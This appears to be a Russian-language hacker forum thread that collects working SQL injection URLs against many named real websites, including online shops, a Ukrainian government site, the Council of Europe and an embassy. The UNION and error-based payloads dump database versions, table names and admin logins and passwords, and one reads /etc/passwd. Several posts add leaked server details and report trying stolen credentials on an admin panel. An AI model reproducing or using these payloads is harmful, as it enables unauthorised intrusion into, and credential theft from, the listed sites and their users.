SQL Инъекции

Code:

http://www.checkersindustrial.com/product.php?id=25+and+row(1,2)in(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),0x3a,floor(rand(0)*2))as+a+from+information_schema.tables+x+group+by+a)

Code:

http://www.motorcyclebag.com/product.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11--

 

Code:

http://ehrle.com.ua/products/products_cat2.php?p1=0&p2=-1+union+select+1,2,3,4,group_concat%28table_name%29,6,7+from+information_schema.tables--+

ТИЦ 10.

 

4.1.22-lk-log:antiscam@localhost

 

http://www.boomtowndesign.com/portfolio-project.php?id=56 union select version(),2-- 1

http://www.solardesign.com/projects/project_display.php?id=1 or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1-- 1

http://www.meinhardtgroup.com/keypeople.php?id=-228 union select 1,unhex(hex(concat(user,0x3a,password))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from mysql.user limit 0,1-- 1

http://www.dallaswebdeveloper.com/pages/portfolio.php?id=graphic' limit 0 /*!union*/ select 1,2,3,/*!table_name*/,5 from information_schema.`tables` limit 17,1-- 1

 

Недвижимость Украины

http://katalog.keystone.com.ua/index.php?region=-12+and+1=2+union+select+1,2,3,concat_ws(0x3a,login,password,email,sitename),5,6,7,8,9+from+users--&cat=19

5.1.49 keystonecomua@localhost keystonekatalog portbld-freebsd8.0

http://katalog.keystone.com.ua/index.php?region=-12+and+1=2+union+select+1,2,3,concat_ws(0x3a,login,password,email,sitename),5,6,7,8,9+from+users--&cat=19

 

магазины (Испания)



http://www.almonedavigo.com/tienda.php?id=-44+union+select+concat_ws(0x3a,version(),user(),database())+--+&tit=Coleccionables%20en%20papel

http://www.motorrad.es/tiendas/tienda.php?id=-3+union+select+1,clave+from+motor_bbdd.usuarios+--+

http://www.recicleta.com/html/tienda.php?tipo=bicicletas&id=-12+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),database()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+--+



http://www.kdekovito.com/tienda.php?id=-9+union+select+1,2,concat_ws(0x3a,Userusuario,passUsuario),4,5,6+from+usuarios_panel+--+


http://www.naturabisse.es/en/tienda.php?id=-335+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),user(),database()),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%20,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54+--++--+

http://www.coleccionarsellos.com/tienda/tienda.php?id=-112+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9+--+

http://www.elbauldelplacer.com/tienda.php?mod=tienda_productos&id=-50+union+select+1,concat_ws(0x3a,nombre,password),3,4,user()+from+usuarios+--+

http://www.motocross.es/tienda.php?id=-24+union+select+concat_ws(0x3a,nickname,password)+from+usuarios+--+


http://www.artcorporal.es/web/tienda.php?id=1&id_subcategoria=-1+union+select+1,concat_ws(0x3a,User_login,user_pass),3,4,5,6,7,8,9,10+from+wp_users+--+


http://www.hectorgomis.com/tienda.php?id=8&pag=9&sub=-13+union+select+1,pass,3+from+usuarios+--+


http://lacacharreriadekuentin.com/tienda.php?id=-4+union+select+1,concat_ws(0x3a,version(),user(),database())+--+

http://www.1000bebes.com/tienda.php?mod=producto&iu=-1444+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17+--+

http://www.ccriberadelxuquer.com/tienda.php?id=-93+union+select+1,2,concat_ws(0x3a,nombre,passwd),4,5,6,7,8,9,10,11+from+manilva.usuarios+--+

http://www.foronum.com/links-ficha-tienda.php?id=-61+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13+--+

http://www.estudiocanfranc.com/carritocompra/tienda.php?val=1&id=-56++union+select+1,2,3,4444,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+

http://www.powderchile.cl/tienda.php?funcion=ver_categoria&id=-8+union+select+concat_ws(0x3a,login,pass)+from+administrador+--+

http://cyberpunks.es/spar/tienda.php?id=-10+union+select+1,2,concat_ws(0x3a,user,pass),4,5,6,7,8,9,10,11,12,13+from+ad1690.usuarios+--+

 

ЛДПР новосибирск

http://www.ldpr-nsk.ru/?tpage=snews&year=2010&mounth=10&day=-19+and+1=2+union+select+1,2,3,4,concat(@@version,0x20,user(),0x20,database(),0x20,@@version_compile_os)+--


5.1.50-log ldpr-nsk@localhost ldprnsk_ldpr redhat-linux-gnu

 

http://citidesk.ru/browse_classifieds.php?classifiedcat_id=160+or+(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+TABLE_NAME+from+information_schema.tables+where(table_schema!=0x696E666F726D6174696F6E5F736368656D61)limit+0,1),1,64),floor(rand(0)*2)))

ТИЦ : 20
4k

 

PHP:

http://dialogkyiv.com.ua/index.php?id=5&show=4nalbum&do=showpic&pid=-42+union+select+user_website+from+inform_users+whe%20%20re+user_website+LIKE+0x2575626225+LIMIT+0,1--+

http://www.ntc.com.tr/resim.php?id=17&katid=2%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1

http://www.biyikoglutesisleri.com/resim.php?id=17&katid=2%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1

 

http://www.brassjunkies.com/auction_details.php?auction_id=100131+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+

 

http://www.yeu-international.org/nm/3/article.php?id=40+union+select+1,2,3,4,5,6,7,8,9--

 

http://www.warrandale.com/portfolio-details.php?id=-43 union select 1,2,concat(user,0x3a,password),4,5,6,7 from administrators-- 1&c=prtf

 

Мини сборочка)

ricklemay.com тИЦ — 10 PR — 3

Code:

http://www.ricklemay.com/index.php?id=10&uid=-16+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users+--+

valeri.ru

Code:

http://www.valeri.ru/index.php?action=types&id=8&uid=-383+union+select+1,password,3,4,5,6,7,8,9,10,11+from+users+--+

www.uidjournal.com тИЦ — 10 PR — 4

Code:

http://www.uidjournal.com/index.php?page=solutionsguide&provider=-4'+union+select+1,2,concat_ws(0x3a3a,email,password),4,5,6,7,8,9,10,11,12,13,14+from+users+--+

marquardt-switches.com тИЦ — 10 PR — 3

Code:

http://www.marquardt-switches.com/232.html?&L=1&tx_productkatalog_pi1%5Bmode%5D=detail2&tx_productkatalog_pi1%5Bmodifier%5D=0&tx_productkatalog_pi1%5Bvalue%5D=1810&tx_productkatalog_pi1%5Bpointer%5D=2&cHash=e51d8d4c7b&home=toggle-switches.html&prodID=-6044+union+select+1,2,3,4,5,6+--+

asatpo.com

Code:

http://www.asatpo.com/normativa/ver_normativa.php?n=-6'+union+select+1,group_concat(table_name),3+from+information_schema.tables+--+

opp.ca тИЦ — 10 PR — 7

Code:

http://www.opp.ca/ecms/index.php?id=405&nid=61+union+select+1,2,3,4,password,6+from+users+--+

hessenweb.de тИЦ — 10 PR — 4

Code:

http://www.hessenweb.de/index.php?id=veranstaltungen&no_cache=1&tx_jwcalendar_pi1[uid]=698&tx_jwcalendar_pi1[time]=1264978800+UNion+SElect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65+--+&tx_jwcalendar_pi1[view]=LIST&cHash=4b5ebde116

lindy-hop.ch тИЦ — 10 PR — 3

Code:

http://lindy-hop.ch/cms/index.php?id=10&tx_jwcalendar_pi1%5Bview%5D=LIST&tx_jwcalendar_pi1%5Buid%5D=11&tx_jwcalendar_pi1%5Btime%5D=-1272664800+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65+from+be_users+--+&cHash=14d7bf51d0

bikezona.tv тИЦ — 10 PR — 4

Code:

http://www.bikezona.tv/videomaton/index.php?idvideo=-407'+union+select+1,2,concat_Ws(0x3a3a,login,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+bztv_usuarios+--+

mapeco.fr

Code:

http://www.mapeco.fr/index.php?host=ccih&l=1&id=-247600596+union+select+111+--+&cmd=zoom&op=locate&module=epci&etape=3&mode=&val=&niv=-1&XMIN=423000&YMIN=2489500&XMAX=489000&YMAX=2529500&XMINEXTENT=423000&YMINEXTENT=2489500&XMAXEXTENT=489000&YMAXEXTENT=2529500&info=5&cible=&cx=206&cy=236

corematerials.3acomposites.com

Code:

http://www.corematerials.3acomposites.com/316.html?&no_cache=1&L=1&tx_nicosdirectory_pi1%5Bmode%5D=liste&tx_nicosdirectory_pi1%5Bmodifier%5D=cou&tx_nicosdirectory_pi1%5Bvalue%5D=-23_1+UNion+Select+user(),222,database(),444+--+&tx_nicosdirectory_pi1%5Bpointer%5D=0&cHash=00cdf0441c

malighting.com тИЦ — 20 PR — 4

Code:

http://www.malighting.com/control.html?&tx_lightpowerpdb_pi1[parent_gruppe]=233'&tx_lightpowerpdb_pi1[produkt_id]=-2649+union+select+1,2,concat_Ws(0x3a3a,admin_login,admin_password),4,5,6,7,8,9+from+pdb_admin+--+&cHash=80a870b15e'

corporate.lanxess.com тИЦ — 40 PR — 6

Code:

http://corporate.lanxess.com/index.php?id=289&L=0&tx_editfiltersystem_pi1%5Bcmd%5D=detail&tx_editfiltersystem_news_pi1%5Buid%5D=-16717+UNion+SElect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,LOAD_FILE(0x2F6574632F706173737764),78+--+&tx_editfiltersystem_pi1%5Bnews_category%5D=34'&tx_editfiltersystem_pi1%5Bnews_date_start%5D=9.2009'&tx_editfiltersystem_pi1%5Bnews_date_end%5D=9.2010'

fs-eprocure.com

Code:

http://www.fs-eprocure.com/index.php?id=131&no_cache=1&L=1%2F&tx_editfiltersystem_pi1%5Bcmd%5D=detail&tx_editfiltersystem_news_pi1%5Buid%5D=-1054+UNioN+sELecT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56+--+&cHash=24d6156e85f25dc6d07cf6d6fcbc2052

ferrostaalpower.com

Code:

http://ferrostaalpower.com/index.php?id=131&no_cache=1&L=5&tx_editfiltersystem_pi1%5Bcmd%5D=detail&tx_editfiltersystem_news_pi1%5Buid%5D=-1259+UnioN+SelecT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56+from+information_schema.tables+--+&cHash=9170bd1cf7

couplemeets.de

Code:

http://www.couplemeets.de/dev/index.php?id=26&tx_nicosdirectory_pi1%5Bmode%5D=detail&tx_nicosdirectory_pi1%5Bmodifier%5D=cat&tx_nicosdirectory_pi1%5Bvalue%5D=-12+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a3a,username,password,admin),19,20,21+from+be_users+limit+1,1+--+&cHash=81f10fc595

foodtrendexperience.com

Code:

http://www.foodtrendexperience.com/fte/index.php?idVideo=-15+union+select+1,2,user(),4,5,6,7,8,9,10,11,12+--+

darinfo.com.ua тИЦ — 10 PR — 1

Code:

http://www.darinfo.com.ua/inter/index.php?action=base&id=5&location=1&uid=-728'+union+select+1,2,3,4,5,6,7,8,9,version()+--+

gruenberg.de тИЦ — 10 PR — 4

Code:

http://www.gruenberg.de/index.php?sp=de&nr=-17+union+select+1,user(),3,4,5,6+from+information_schema.tables+--+&uid=d_bilder/&id=showbild&alt=%26id%3Dtour%26uid%3D%26uuid%3D

allhometeens.com

Code:

http://www.allhometeens.com/?page=inner&id_article=-43'+union+select+1,user(),3,4,5,6,7,8+--+

foruminst.sk тИЦ — 10 PR — 5

Code:

http://www.foruminst.sk/index.php?p=publications&t=a&xp=&publ_id=408'&link=publ/egyeb/mezeiang/urbandevelopment,,&MId=&Lev=&Ind=-1+union+select+1,2,concat_ws(0x3a3a,email,usname,uspasswd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users+--+&P=index,en,

stfw.ch тИЦ — 10 PR — 5

Code:

http://www.stfw.ch/no_cache/stfw/portrait/schulleitung/?tx_spdirectory_pi1%5Bmode%5D=detail&tx_spdirectory_pi1%5Bvalue%5D=-90+/**/+UNioN+/**/+/**/+SelECt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,user(),42,43,44+--+

soziologie.de тИЦ — 10 PR — 7

Code:

http://www.soziologie.de/index.php?id=4&tx_jwcalendar_pi1%5Btime%5D=-3600+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(table_name),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65+from+information_schema.tables+--+&tx_jwcalendar_pi1%5Buid%5D=81&tx_jwcalendar_pi1%5Bview%5D=MONTH&cHash=ba2015f647

ricerca.polimi.it тИЦ — 10 PR — 5

Code:

http://www.ricerca.polimi.it/index.php?id=4425&tx_wfqbe_pi1%5Bid%5D=25560+union+select+1,2,user(),4,5,6,7,8,9,10+from+information_schema.tables+--+

blv-sport.de тИЦ — 10 PR — 4

Code:

http://blv-sport.de/index.php?id=232&tx_wfqbe_pi1%5Buid%5D=-442+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13+from+laufsport+--+

architector.dp.ua тИЦ — 40 PR — 2

Code:

http://www.architector.dp.ua/?catalog&dep=study&arts=6&id=-36'+union+select+1,2,3,concat_ws(0x3a3a,login,passw),5,6,7,8,9,10,11,12,13+from+admin_users+--+

photographysalley-gallery.com тИЦ — 10 PR — 3

Code:

http://photographysalley-gallery.com/index.php?com=evenement&idevent=-1'+union+select+1,2,3,4,5,6,7,8+from+information_schema.tables+--+

carronlugon.com тИЦ — 10 PR — 2

Code:

http://www.carronlugon.com/index.php?mod=galerie&idevent=-15+union+select+1,2,concat_Ws(0x3a3a,login,psw,nom,privilege),4+from+utilisateur+--+

aflakshop.com

Code:

http://aflakshop.com/cat.php?id=-1'+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables+--+&page=50&AdsID=1586&ads_type=&percent=

readingmatrix.com тИЦ — 10 PR — 5

Code:

http://www.readingmatrix.com/ecalendar/index.php?action=details&event_id=-80+union+select+1,2,3,4,5,user(),7,8,9,10,11,12+--+

robot-ch.org тИЦ — 10 PR — 6

Code:

http://www.robot-ch.org/site/modules/piCal/index.php?com_mode=nest&com_order=0&event_id=-161'+union+select+1,2,3,concat_ws(0x3a3a,login,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+users+limit+1,1+--+

media-watch.tv тИЦ — 10 PR — 3

Code:

http://media-watch.tv/e_event_form.php?event_id=85+union+select+1,2,3,4,concat_Ws(0x3a3a,user_name,password),6,7,8,9,10,11+from+user+limit+1,1+--+&ref_page=/index.php

bistum-dresden-meissen.de тИЦ — 10 PR — 5

Code:

http://www.bistum-dresden-meissen.de/front_content.php?idcat=2110'&idart=11842'&id=-457+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+&st=1

babochka-style.ru

Code:

http://babochka-style.ru/index.php?&act=shop&action=showitem&id=-31'+union+select+1,2,3,concat_ws(0x3a3a,login,password),5,6+from+users+--+

drift.s-w-s.ru

Code:

http://drift.s-w-s.ru/index.php?&act=shop&action=showitem&id=-8'+union+select+1,2,3,concat_ws(0x3a3a,login,password),5,6,7,8,9,10,11+from+users+limit+1,1+--+

firestreamvault.com тИЦ — 10 PR — 1

Code:

http://firestreamvault.com/main/index.php?go=front/index.php&go=showitem&cat_id=580&narrow=&item_id=-1434+union+select+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+--+&user_id=

ПС баянов НЕТ!

 

какбэ отакэ

HTML:

http://specavia.com.ua/l/ru/pages/120&mod=news&news=-1+union+select+1,concat(name,0x7c,pass,0x7c,id,0x3c62723e),3,4+from+specavia.users+--+

HTML:

http://www.slavrada.gov.ua/?view=votes&voteID=-1+union+select+1,2,3,4,5,6,7,username,user_password,user_form_salt,11,12,13,14,15+from+phpbb3_users+--+

 

http://el-ero.ru/aboutthisgood.php?ID=1603+or+1+group+by+concat((select+version()),rand(0)|0)+having+min(0)

http://www.serovmet.ru/ru/press/news/index.php?id15=-9373+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a,version(),@@version_compile_os,user(),database()),10,11,12,13,14,15,16,17,18+--+

http://autoperspect.ru/index.php?all_news&details=-156+union+select+1,2,concat_ws(0x3a3a,version(),@@version_compile_os,user(),database()),4,5,6,7,8,9,10,11+--+

http://iranembassy.ru/?section=news&page=article&view=article&id=-479+union+select+1,2,3,concat_ws(0x3a3a,version(),@@version_compile_os,user(),database()),5,6,7,8,9,10,11,12,13,14+--+

http://superrest.ru/town_info.php?id=-132+union+select+1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14+--+

http://www.ucentrec.ru/seminars/seminar/?info_id=-323+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a3a,@@version_compile_os,user(),database())+--+

 

http://bitpartner.com.ua/office/register.php?sid=2+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3,version(),user(),database()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--

 

EU

Совет Европы (Council of Europe)
_________________________________________________

http://www.coe.int/t/congress/sessions/19/NewsSearch/default_en.asp?p=nwz&id=6586+OR(1=(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES for xml raw))&lmLangue=1

MSSQL version:

тИЦ — 2200
PR — 9

 

dunravenhouse.com
PR - 2

Code:

https://www.dunravenhouse.com/cart/index.php?cat_id=-86+union+select+concat_ws(0x3,version(),user(),database()),2,3,4,5,6,7,8--

staceyspans.com
PR - 2

Code:

http://www.staceyspans.com/cart/index.php?cat_id=-5+union+select+concat_ws(0x3,version(),user(),database()),2,3,4,5,6,7,8--

cellgroup.com
PR - 3

Code:

http://www.cellgroup.com/estore/index.php?cat_id=-11+union+select+concat_ws(0x3,version(),user(),database()),2,3,4,5,6,7,8--

marketitdirect.net
PR - 1

Code:

http://www.marketitdirect.net/shop/index.php?cat_id=-3+union+select+concat_ws(0x3,version(),user(),database()),2,3,4,5,6,7,8--

rockpaidat.com
PR - 3

Code:

http://www.rockpaidat.com/shop/index.php?cat_id=-23+union+select+concat_ws(0x3,version(),user(),database()),2,3,4,5,6,7,8--

marshwoodgardens.co.nz
PR - 4

Code:

http://www.marshwoodgardens.co.nz/index.php?cat_id=-1+union+select+concat_ws(0x3,version(),user(),database()),2,3,4,5,6,7,8--

vandongens.com
PR - 2

Code:

http://www.vandongens.com/catalogue/index.php?cat_id=-244+union+select+concat_ws(0x3,version(),user(),database()),2,3,4,5,6,7,8--

 

+Дополнение к FeldMarshall

 

рыбаловная база "УДАЧА"

Code:

http://www.udacha-volga.ru/index.php?page=1&newsid=-95+and+1=2+union+select+1,2,3,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),5+--

4.1.25-log [email protected] wwwudachavolgaru portbld-freebsd6.2

Code:

http://www.udacha-volga.ru/index.php?page=1&newsid=-95+and+1=2+union+select+1,2,3,concat_ws(0x3a,login,email,pswd),5+from+administrator--&PHPSESSID=d788d79d683a509f9a86cf2284e5febc

http://www.udacha-volga.ru/admin.php

пассы не подходят